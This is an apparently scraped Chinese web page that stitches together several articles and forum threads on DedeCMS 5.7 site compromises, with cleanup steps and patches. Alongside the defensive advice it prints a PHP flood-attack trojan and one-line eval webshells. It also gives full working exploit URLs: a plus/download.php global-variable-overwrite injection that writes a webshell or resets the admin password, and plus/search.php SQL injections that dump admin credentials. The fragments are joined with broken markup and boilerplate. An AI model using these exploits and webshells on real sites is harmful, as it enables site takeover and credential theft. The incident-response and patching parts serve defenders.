有没有修复dedecms v5.7 漏洞漏洞的软件

分享dedecms DDOS挂马漏洞的解决方法_源码_站长之家
分享dedecms DDOS挂马漏洞的解决方法
[摘要]最近很多dedecms的网站都被挂马了,有的被机房警告,重的被机房强行关站,数不胜数,本文详细讲一下dedecms DDOS挂马漏洞的解决方法,希望对遇到这种情况的站长们有用。
  到年底了,不知不觉过的太快了,最近俺的几个网站受到了机房的严重警告,让我意想不到的是,机房那面竟然说我的网站被挂马了,网站流量总是不断的往外发包,怎么也想不通,网站都稳定运行了好几年了,从没遇到过被挂马这一说,于是我整整工作了三天三夜终于把问题的根源找到了,也是本文的标题 “dedecms ddos挂马漏洞的解决办法”所要讲的。下面我给大家详细的介绍一下我的解决办法,希望遇到这种情况的站长童鞋们,遇到这种问题也能迎刃而解。  Dedecms是国内最有名的php开源系统,也是我用的最多的一个系统,简单实用稳定是我使用了多年的理由,正因为dedecms的开源,也导致了很多黑客盯上了这个程序,没日没夜的研究dedecms的漏洞,也就在最近终于爆发了,很多dedecms的网站都被挂马了,有的被机房警告,重的被机房强行关站,数不胜数。我想说的是既然问题出现了我们就要去解决,只有解决了,你的网站才会长期稳定发展下去。 首先从问题的特征跟大家一一介绍。  被挂马的特征:打开自己的网站首页,用查看源代码的方式会发现自己的网站被增加了许许多多的黑链代码,黑链代码是最简单也最能让站长们看出来的,他无非就是友情链接的代码。  再一个特征就是打开网站会被360安全提示网站存在挂马风险,这一类型的挂马代码,一般是框架代码或者是js代码或者是图片代码,还有个特征就是网站会突然打不开或者打开慢,检查流量会发现自己占用了许多流量,也就是说流量往外发包的特征,也叫UDP 流量发包攻击。以上就是dedecms被挂马的大体特征,下面就讲点实际的,网站被挂马的解决办法和预防措施。  首先把网站程序的代码下载到自己的本地,用sinesafe木马清除工具检测了一下,发现data/cache/目录下有许多脚本木马,打开木马脚本发现了一些不认识的PHP代码,把代码放到sinesafe木马工具里深度剖析了一下发现了木马特征,代码如下:&?phpset_time_limit(984918);$host = $_GET['host'];$port = $_GET['port'];$exec_time = $_GET['time'];$Sendlen = 65535;$packets = 0;}echo &================================================&br&&;echo & &font color=blue&&br&&;echo & SYN Flood 模块&br&&;echo & 作者:ybhacker&br&&;echo & 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!&/font&&br&&;echo &================================================&br&&br&&;echo & 攻击包总数:&font color=Red&&span class=\&text\&&&.$packets.& 个数据包&/span&&br&&br&&/font&&;echo & 攻击总流量:&font color=Red&&span class=\&text\&&&.round(($packets*65*8)/(),2).& Mbps&/span&&br&&br&&/font&&;echo & 攻击总字节:&font color=Red&&span class=\&text\&&&.time('h:i:s').& 字节&/span&&br&&br&&/font&&;echo &Packet complete at &.time('h:i:s').& with $packets (& .round(($packets*65*8)/(),2). & Mbps) packets averaging &. round($packets/$exec_time, 2) . & packets/s \n&;?&  我在网上查到这是udp流量攻击的php脚本木马,这个木马就是可以以网站脚本的权限运行就可以达到ddos 流量攻击的效果。无需服务器的权限,这我才明白过来为什么机房说我网站一直都在往外发包,运行这个脚本的网站都会打开缓慢,我的网站也在其中。既然找到了问题所在,那我就要开刀了,点击清除木马代码,一下全都给清除了。Data/cache/目录下已经没有陌生的文件名了。最后总结了一下分五个解决和预防措施。  1、dedecms目录的安全设置:data/cache/ templets uploads 目录设置可读写,不可执行权限。include、member、plus设置可读 可执行 不可写权限,由于dedecms并没有任何地方使用存储的过程,因此可以禁用 FILE、EXECUTE 等执行存储过程或文件操作的权限。  2、网站程序安全:这也是最根本的防范,如果是虚拟空间建议找专业做网站安全维护的来给做网站程序的安全,只有网站安全了才能带来安全稳定的客户源。  3、程序的更新: 打开dedecms后台看看有没有更新的补丁,如果有请及时的更新和打补丁,如果自己的版本很老了,我建议重新安装新的版本,因为新的版本都是比较安全的,有很多地方和老版本的不一样。  4、后台管理目录:dedecms后台管理目录一般默认是dedecms,很多站长从来不在乎这个后台地址,我很负责任的告诉大家,管理的目录地址如果是默认的那你被挂马的几率那就是%100.建议把目录的名字改成一些数字加字母符号组合的名字。  5 、FTP 网站管理密码: FTP密码和网站管理密码建议经常修改,因为很多黑客都在用暴力破解密码,把密码改的复杂些尽量掺杂着特殊符合和字母。  以上就是我的解决办法和预防措施,道高一尺魔高一丈,其实解决问题是很快乐的,当你解决掉问题的那一瞬间,其实都不算什么都只是小事而已,态度决定了一切。DedeCms下载: 软件大小:7.23MB 软件类别:国产软件 |
软件语言:简体中文 运行环境:PHP/Mysql 软件授权:免费版 更新时间: 16:20:47 相关链接:本文转自:
本次DEDECMS教程小编为大家讲解DEDECMS列表页中随机调用缩略图的方法,默认的缩略图是取第一张图片,通过修...
热门源码下载推荐
最受关注报导
编辑推荐排行关于网站后台找不到的问题 今天给大家带来一个关于 dedecms 一个入侵的思路 起因: 一朋友让我帮忙检测一个网站 呵呵学校网站,大家可不要搞破坏检测下 我已经通知管理了 (一) 首先拿过这个站我的思路是先到处点击一下看看是什么系统的。 我首先点击了下边的...
一、织梦CMS被挂马特征汇总 2013上半年织梦CMS被挂马特征汇总。最近很多朋友反应后台多了几个系统管理员用户:service、spider等,而且自己之前的管理员用户登陆时候会提示用户名不存在。还有朋友的织梦CMS网站里出现asdd、90sec、service等PHP格式的非DedeC...
9月30日,安全漏洞报告平台乌云称DedeCMS存在一个严重的跨站脚本漏洞,攻击者可以通过前台提交友情链接提交恶意JS代码,当管理员访问后台管理友情链接时,触发攻击的恶意代码,导致攻击者直接盗用管理员身份登陆后台,最终导致网站被完全控制,植入恶意网站...
织梦DedeCMS V5.7 (SP1) 安全包,是360网站安全团队针对DedeCMS定制的安全补丁,专门修复DedeCMS的已知0day漏洞 安全补丁下载 下载织梦DedeCMS安全补丁包: 补丁适用版本:织梦DedeCMS V5.7 SP1正式版(发布)补丁,如您版本不满足,请到官方先升...
DedeCMS网站被挂马,主要问题还是安全设置方面做得不到位,这里详细介绍Linux下DedeCMS程序安全的设置。 目录权限设置 web服务器运行的用户与目录所有者用户必须不一样,比如apache运行的用户为www,那么网站目录设置的所有者就应该不能设置为www,而是设置...
DedeCMS不久前爆出的 90sec.php 漏洞,困扰了很多站长朋友, 站长反馈网站木马文件删除后,第二天又重新出现了。 攻击者利用这个漏洞,把一段恶意PHP代码写入数据库的某个数据字段内,再利用DedeCMS对这个字段里的数据的处理时会执行插入到数据库里的恶意PHP...
DedeCMS被挂马、被黑怎么办? DedeCMS被挂马后,很多童鞋慌了,不知道如何处理。第一时间找到木马并删除,找不到或者太多了不知如何处理,可以通过后台备份数据库数据、备份附件数据(uploads)、备份模板(templets),然后安装新dedecms系统,使用以上备份数据...
DedeCMS漏洞之mysql_error_trace.inc日志信息 DEDE mysql_error_trace.inc 日志里面残留被入侵过的账号和密码 漏洞说明:plus/search.php被爆过以后,信息会记录在/data/mysql_error_trace.inc 日志里面 比如被某人注入得到的账号和密码 还有后台都残留在里...
DedeCMS漏洞文件之carbuyaction.php,这个漏洞长达几年,跨了几个版本,网上也公开过了,DedeCMS就是不修复,可以直接导致拿shell 详细说明:漏洞文件 carbuyaction.php 本地试了一下,最新DedeCMS版本一样可行。 首先利用cookie修改工具,加上 code=alipay...
共 1页9条记录
猜你也喜欢看这些...
©2014 织梦吧(d8) DedeCMS学习交流平台最近被挂马90sec修改管理员等可能漏洞修复|DedeCMS 安装使用 - DedeCMS网站内容管理系统官方论坛 - Powered by phpwind
查看完整版本: [--
最近被挂马90sec修改管理员等可能漏洞修复
具体不知道哪个文件有问题,初步怀疑是/plus/download.php和mytag_js.php这个文件,反正服务器上DEDECMS的程序网站都被挂马了。今天发现网站打不开,看网站情况,半夜2点流量高峰,IP为无锡的,重启后网站打开,所有的DEDE后台的网站模版被修改为default,界面乱了,后台增加了service管理员,有的管理员被修改为spider,你登录提示用户名不存在。根目录下增加了asdd.php文件, plus下一堆不明文件,90sec.php,service.php,内容分别为:&?php eval($_POST[guige]);?&,&?php eval($_POST[fuwu]);?&,根目录下增加了article目录,里面增加了木马生成的一堆赌博网页。采用其他后台的程序没有被挂马。系统为centos.首先把模版修改回来吧。清理方法:1、删除增加的管理员:service2、删除根目录的asdd.php3、删除plus下的download.php,mytag_js.php90sec.php,service.php,vliw.php,vuew.php,digg.php,xiao.php,bakup.php等可疑文件。4、织梦程序后台病毒扫描都会出现一个plus/90sec.的文件,得每天删除,可是删除了,第二天就又出现了???可以能是getshell了,可以在后台-&模板-&自定义宏标记中删除其中的条目之后可以升级下include/dedesql.class.php文件即可.5、chmod -R /plus,给plus只读权限6、删除data/cache/mytag-9013.htm 这种类型的所有htm文件,删除tplcache的缓存文件。发现的越来越多了7、数据库要清空dede_mytag表最后备份数据,保险起见,重装下程序吧,漏洞出来N天了,DEDE官方也没见说法,以上综合于网络。以下是漏洞之处作者:鬼哥看贴不回,没JJ漏洞大家都知道是哪个。 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?getshell 很容易 。 既然刚发出来的是 sql方法getshell&&我也看到几个人发了sql增加表mytag的内容。但是测试了下。。失败原因: 用的语句是update&&很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴&&错误。。现在要做的饶过即可。以前也其实我一直在玩。。郁闷出过那么多dede sql 结合饶过,成功INSERT。构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(&90sec.php&,&&?php eval($_POST[guige]);?&&);{/dede:php}') # @`\'`EXP:plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96成功增加。访问plus/mytag_js.php?aid=9013生成一句话木马.菜刀连接 plus/90sec.php&&密码 guige测试OK。临时补丁:不知道别的地方还有没有覆盖变量 反正这个漏洞是修复的include/dedesql.class.phpif(isset($GLOBALS['arrs1'])){$v1 = $v2 = &;for($i=0;isset($arrs1[$i]);$i++){$v1 .= chr($arrs1[$i]);}for($i=0;isset($arrs2[$i]);$i++){// $v2 .= chr($arrs2[$i]);&&//注释这里}$GLOBALS[$v1] .= $v2;}
顶之,鄙视官方
我的也被挂了···········
前段时间就发现服务器上的网站基本都有一句话木马90sec
我有网站也中招了
[attachment=101313] 好坑啊,我的也有,不过及时处理掉了。
批量挂马...
官方给个说法啊 要不换CMS吧
&&&& &&&&&&我的也被挂了 一样的
难道是又爆新漏洞了吗&&这么多站呗黑
我也是遇到同样的情况&&天天入侵我的站
不幸也中招了。真残酷,删了一遍又一遍的。
这次挂马起码数万网站。。。损失严重啊
我的也被挂了!
我3个站被挂了,这个有会整的没?
唉,这下惨了
90sec,我的好几个网站都是这样,妈妈的,日他奶奶的,,,
要解决啊,我的有好几个站都是这样。。。。。。。。
我的也是被挂马了的,导致apache的服务占用内存直接到几百兆,而且管理员也被改成spider了。。。
不错的案例分析,飘过
我8个网站,8个都挂了!!草!!
签到。也被日了
跟楼主一样,鉴定完毕
我的也被挂了
呵呵。。。。。。。。
真是让人汗呀,到处都是危险,一些非商业的网站也难逃
从这里可以看出,服务器截取URL长度是多么的重要,正常的URL不会这么长的
存在php的目录禁止写入,不存在php的目录禁止执行php,应该可以很大程度上的解决问题
鄙视那些往无辜网站挂吗的人
我也中刀了,打击有没有解决办法,官方有补丁吗
主机屋的全挂了。
批量挂马...
批量挂马几个网站中招了
几个网站管理员被改成spider
织梦头条显图片
我的也挂了,
近期,很多DEDE织梦网站中招,其中有70%的织梦站中过“90sec.php”这样的病毒文件,即使是我们手动清理90sec.php”文件后,数据库中还是存在病毒的,那么今天悦动创想分享下彻底清理此病毒文件的工具,已经亲测了,安全无误。此工具是安全联盟站长平台“专家漏洞修复中心”发布的工具。经安全联盟站长平台的漏洞修复专家分析,这些站长使用了“DedeCMS”建站软件。安全联盟站长平台研究人员分析发现“罪魁祸首”为近期爆发的“高危”安全漏洞所致。安全联盟站长平台为DedeCMS的站长量身打造一个“DedeCMS顽固木马后门专杀工具”。该工具只需下载放置到DedeCMS根目录下运行即可,工具可“一键扫描”查找漏洞、网站木马及数据库里的恶意代码并清除干净。使用方法:在使用本工具前,请先进行数据备份工作。织梦数据备份教程:1:上传相应的版本到根目录。2:执行扫描,并清理相关病毒文件。3:清理后,删除根目录中的此工具。工具下载:如果对你有帮助的话,请回复下,让更多的织梦用户收益!
可以联系QQ 有常彻底解决dede被挂马攻击
总有些2B货黑了几个小站就以为了不起了,技术上的得意掩饰不了他人品上的匮乏
支持一下先!!!!!!!!!!!!!
查看完整版本: [--
Powered by
Gzip enabledSEO研究协会网
Dedecms最新注入漏洞分析及修复方法
查看: 1465|
摘要: 最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以
最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。一. 漏洞跟踪发布时间:日漏洞描述:DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构,完全开源加上强大稳定的技术架构,既可以用来构建复杂体系的企业信息门户或电子商务网站平台,也可以用来管理简单内容发布网站,不管是商务资源门户还是娱乐信息门户,它都是您管理网站的好帮手。漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[‘arrs1’]、$GLOBALS[‘arrs1’]这两个全局变量之前未对其进行初始化,导致能够覆盖任意全局变量。漏洞危害:因为dedecms的使用非常广泛,而此漏洞利用方便,危害性高,能够远程获取管理后台,进而直接getshell获取系统控制权。触发条件:确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll,如图所示:受影响版本:dedecms 5.7二. 漏洞原理首先说一下dedecms不安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第79行:foreach(Array(‘_GET’,'_POST’,'_COOKIE’) as $_request)&&&&& {&&&&&&&&&&&& foreach($$_request as $_k =& $_v) &&&&&&&&&&& {&&&&&&&&&&&&&&&&&&& if($_k == ‘nvarname’) ${$_k} = $_v;&&&&&&&&&&&&&&&&&& else ${$_k} = _RunMagicQuotes($_v);&&&&&&&&&&& }&&&&& }万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们可以看到,程序从GPC数组中取出名值对后,只是对$_v做了简单的addslashes处理,就直接赋给了${$_k},实现了类似全局变量覆盖的机制,设计的初衷是为了开发方便,但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题,但是dede的这段代码使php付出的努力全部白费。下面我们回归漏洞。首先是/include/dedesql.class.php的第589-600行,在执行这段代码之前,程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制,利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中,我们可以控制$GLOBALS['cfg_dbprefix']的值。然后,我们来看一下如何利用$GLOBALS['cfg_dbprefix']。这里在/include/dedesql.class.php的第512行SetQuery函数中,代码如下这里因为$GLOBALS['cfg_dbprefix']是可控的,进而$prefix也是可控的,所以在这儿就造成了SQL注入。下面跟踪一下整个漏洞的触发过程,这是网上已经公开的PoC:http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。这里跟入dedesql.class.php代码,如图这里我们传入的arrs1、arrs2两个数组因为还没有被初始化,所以这里$v1、$v2拼接为字符串,如图所示所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为admin` SET `userid`=’test’, `pwd`=’f297a57a5ae4′ where id=1 #继续跟踪代码执行,跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。三. 漏洞验证PoC:http://localhost/dedecms5.7/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=116&arrs2[]=101&arrs2[]=115&arrs2[]=116&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35验证截图:四. 漏洞修复0×01、修改php.ini,确保开启php_mysqli.dll扩展。0×02、修改/include/dedesql.class.php中的代码,如下所示require_once(DEDEINC.’/common.func.php’);//引入数据库类if ($GLOBALS['cfg_mysql_type'] == ‘mysqli’ && function_exists(“mysqli_init”)){&&&&&&& //echo $GLOBALS['cfg_mysql_type'];&&&&&& //&&&&&& require_once(DEDEINC.’/dedesqli.class.php’);} else {&&&&&&& require_once(DEDEINC.’/dedesql.class.php’);}//require_once(DEDEINC.’/common.func.php’);
SEO研究协会网极力推荐关注以下账号,随时获取最新技术文章和官方活动
巨推学院微信公众号
巨推学院新浪微博
巨推学院腾讯微博
SEO研究协会网微博
赞一个0无&语0 朕已阅0鄙&视0打酱油0
上一篇:下一篇:dedecms注入漏洞plus/search.php的利用及修复方法
很多骇客喜欢dedecms,因为经常有各种漏洞曝出,利用起来也都很简单。目前dedecms的最新又曝高危search.php注入漏洞,dedecms注入漏洞plus/search.php的利用及修复方法:
漏洞的利用细节:
/plus/search.php?keyword=as&typeArr[
报错如果为:Safe Alert: Request Error step 2 !
则利用以下exp:/plus/search.php?keyword=as&typeArr[111=@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`#@__admin`#@`\'`+]=a
/plus/search.php?keyword=as&typeArr[
报错如果为:Safe Alert: Request Error step 1 !
则利用以下exp:/plus/search.php?keyword=as&typeArr[111=@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`#@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)#@`\'`+]=a
漏洞修复:
常规安全更新
include/arc.searchview.class.php, 搜索功能准确度优化
member/myfriend_group.php, 修复会员中心会员分组功能存在的安全隐患
plus/search.php, 修复搜索功能存在的安全隐患
登录DEDECMS后台会有提示,更新即可。不过貌似官方没有提供安全更新补丁的下载地址,找了半天没找到~
漏洞分析:
存在漏洞的文件/plus/search.php
//引入栏目缓存并看关键字是否有相关栏目内容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
foreach($typeArr as $id=&$typename)
$keywordn = str_replace($typename, ‘ ‘, $keyword);
if($keyword != $keywordn)
$keyword = $
$typeid = $ //对ID没做任何过滤 导致注入
$keyword = addslashes(cn_substr($keyword,30));
//引入栏目缓存并看关键字是否有相关栏目内容
require_once($typenameCacheFile);
if(isset($typeArr) && is_array($typeArr))
foreach($typeArr as $id=&$typename)
//$keywordn = str_replace($typename, ‘ ‘, $keyword);
$keywordn = $
if($keyword != $keywordn)
$keyword = HtmlReplace($keywordn);//防XSS
$typeid = intval($id); //强制转换为数字型
$keyword = addslashes(cn_substr($keyword,30));
dedecms注入漏洞plus/search.php的利用及修复方法
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。

我要回帖

更多关于 dedecms 漏洞 的文章

 

随机推荐